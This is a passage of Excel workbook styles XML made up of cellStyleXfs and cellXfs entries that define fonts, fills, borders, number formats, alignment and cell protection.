    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="50" fillId="44" borderId="24" applyNumberFormat="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="170">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="5" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="0" borderId="3" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="0" borderId="4" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="1" xfId="86" applyNumberFormat="1"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1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0"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0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="70" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="57" fontId="3" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="11" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="12" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="12" fillId="0" borderId="1" xfId="71" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="84"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49" fontId="13" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="10" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="10" fillId="3" borderId="1" xfId="71" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="10" fillId="0" borderId="1" xfId="71" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="13" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="49" fontId="10" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="5" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="4" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="13" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="5" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="4" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="15" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="15" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="5" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="5" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="10" fillId="0" borderId="1" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="1" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="2" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="18" fillId="2" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="80" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="20" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="4" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="15" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="13" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="87" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="88" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="15" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="12" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="12" fillId="0" borderId="6" xfId="89" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="75" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="21" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="1" xfId="90" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="91" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="21" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
